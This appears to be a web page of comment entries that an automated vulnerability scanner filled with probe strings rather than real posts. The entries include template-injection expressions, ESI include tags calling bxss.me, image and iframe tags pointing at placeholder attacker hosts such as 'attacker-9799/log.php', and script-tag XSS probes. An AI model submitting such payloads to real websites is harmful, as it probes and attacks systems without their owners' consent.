  2021-05-06 08:11:04


  ${9999964+9999133}


 • pHqghUme

  2021-05-06 08:11:04


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 08:11:03


  1


 • pHqghUme

  2021-05-06 08:11:03


  1


 • pHqghUme

  2021-05-06 08:11:03


  1


 • pHqghUme

  2021-05-06 08:11:02


  1


 • ${9999794+10000103}

  2021-05-06 08:11:02


  1


 • pHqghUme

  2021-05-06 08:11:02


  1


 • pHqghUme

  2021-05-06 08:11:01


  1


 • pHqghUme

  2021-05-06 08:11:00


  1


 • pHqghUme

  2021-05-06 08:11:00


  1


 • pHqghUme

  2021-05-06 08:11:00


  1


 • pHqghUme

  2021-05-06 08:10:59


  1


 • pHqghUme

  2021-05-06 08:10:59


  1


 • pHqghUme

  2021-05-06 08:10:58


  1


 • pHqghUme

  2021-05-06 08:10:57


  1


 • pHqghUme

  2021-05-06 08:10:56


  KflaHCmx


 • pHqghUme

  2021-05-06 08:10:56


  1


 • eA6U5yPB

  2021-05-06 08:10:54


  1


 • pHqghUme

  2021-05-06 08:10:53


  1


 • pHqghUme

  2021-05-06 08:10:52


  1


 • pHqghUme

  2021-05-06 08:08:10


  1


 • pHqghUme

  2021-05-06 08:07:41


  1


 • pHqghUme

  2021-05-06 08:07:23


  1tPssm4frO


 • 1BqI45So4pO

  2021-05-06 08:07:22


  1


 • pHqghUme

  2021-05-06 08:07:21


  1


 • pHqghUme

  2021-05-06 08:07:20


  1


 • pHqghUme

  2021-05-06 08:03:37


  1


 • pHqghUme

  2021-05-06 04:11:16


  1<htq7Yq<


 • pHqghUme

  2021-05-06 04:11:11


  1<img sRc='http://attacker-9799/log.php?


 • pHqghUme

  2021-05-06 04:11:06


  1<GA9S2y x=9676>


 • pHqghUme<pEFlvh<

  2021-05-06 04:11:05


  1


 • pHqghUme

  2021-05-06 04:11:00


  1<ifRAme sRc=9733.com></IfRamE>


 • pHqghUme<img sRc='http://attacker-9315/log.php?

  2021-05-06 04:10:59


  1


 • pHqghUme

  2021-05-06 04:10:54


  1<WQDBOE>UEIIH[!+!]</WQDBOE>


 • pHqghUme

  2021-05-06 04:10:48


  1M82hb <ScRiPt >bFQ7(9090)</ScRiPt>